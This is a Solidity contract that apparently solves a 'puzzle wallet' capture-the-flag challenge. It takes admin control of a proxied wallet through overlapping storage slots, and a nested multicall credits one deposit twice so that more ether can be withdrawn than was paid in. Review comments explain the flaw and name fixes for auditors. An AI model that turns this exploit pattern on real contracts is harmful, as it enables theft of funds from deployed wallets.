// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
/// Minimal view of the target wallet: only the entry points the solver below
/// calls. What each function does is defined by the wallet's implementation,
/// which is not part of this file.
interface IWallet {
    /// Current admin address as reported by the target.
    function admin() external view returns (address);

    /// Submits `_newAdmin` as a proposed admin.
    function proposeNewAdmin(address _newAdmin) external;

    /// Adds `addr` to the wallet's whitelist.
    function addToWhitelist(address addr) external;

    /// Payable deposit entry point.
    function deposit() external payable;

    /// Payable batch entry point taking a list of encoded calls.
    function multicall(bytes[] calldata data) external payable;

    /// Asks the wallet to call `to` with `value` wei and payload `data`.
    function execute(address to, uint256 value, bytes calldata data) external payable;

    /// Sets the wallet's maximum balance value.
    function setMaxBalance(uint256 _maxBalance) external;
}
/// Solver for a "puzzle wallet" challenge instance reached through IWallet.
/// NOTE(review): the wallet's own code is not in this file, so the effect of
/// each call below is inferred from the call sequence and should be confirmed
/// against the target. For auditors, the pattern to look for is a proxy whose
/// storage slots overlap the implementation's, together with a
/// delegatecall-based batch function that lets a single msg.value be credited
/// more than once. Collision-free proxy slots (e.g. EIP-1967) and a deposit
/// guard that nested batches cannot reset address both.
contract PuzzleSolver69000 {
    /// Wallet address supplied at deployment.
    IWallet public wallet;

    // Stored calldata for deposit(); no function in this contract reads it.
    bytes deposit = abi.encodeWithSignature("deposit()");

    // Earlier, unused variant kept from the original:
    // bytes multideposit =
    // abi.encodeWithSelector(wallet.deposit.selector, deposit);

    /// Binds the solver to `_wallet`, then registers this contract through
    /// proposeNewAdmin and addToWhitelist.
    /// NOTE(review): addToWhitelist succeeding right after proposeNewAdmin
    /// suggests the proposal overwrote the value the whitelist check reads
    /// (a proxy/implementation storage overlap) — confirm against the target.
    constructor(address _wallet) {
        IWallet target = IWallet(_wallet);
        wallet = target;
        target.proposeNewAdmin(address(this));
        target.addToWhitelist(address(this));
    }

    /// Sends one 0.002 ether multicall that contains deposit() twice, once
    /// directly and once wrapped in an inner multicall, then asks the wallet
    /// to pay 0.003 ether to the caller.
    /// The 0.002 ether is taken from this contract's balance (msg.value or
    /// ether received earlier); the call reverts if the balance is lower.
    function moneyGlitch() public payable {
        bytes memory depositCall = abi.encodeWithSelector(IWallet.deposit.selector);

        // Inner batch: a single deposit().
        bytes[] memory nested = new bytes[](1);
        nested[0] = depositCall;

        // Outer batch: deposit() followed by multicall([deposit()]).
        bytes[] memory exp = new bytes[](2);
        exp[0] = depositCall;
        exp[1] = abi.encodeWithSelector(IWallet.multicall.selector, nested);

        wallet.multicall{value: 0.002 ether}(exp);
        // NOTE(review): "0x00" is a four-character string literal, so the
        // payload is the ASCII bytes of that text, not a single zero byte.
        wallet.execute(msg.sender, 0.003 ether, "0x00");
    }

    /// Passes the caller's address, widened to uint256, to setMaxBalance and
    /// reverts unless wallet.admin() then equals the caller.
    /// NOTE(review): this can only pass if the max-balance value and the
    /// admin occupy the same storage slot in the target — confirm.
    function solve() external {
        address caller = msg.sender;
        wallet.setMaxBalance(uint256(uint160(caller)));
        require(wallet.admin() == caller, "fuck this");
    }

    // Accept plain ether transfers and calls with unmatched selectors.
    receive() external payable {}

    fallback() external payable {}
}
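// ABI-encoded value of exp[] as built in moneyGlitch() (0xd0e30db0 = deposit(), 0xac9650d8 = multicall(bytes[])):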
//["0xd0e30db0","0xac9650d80000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000004d0e30db000000000000000000000000000000000000000000000000000000000"]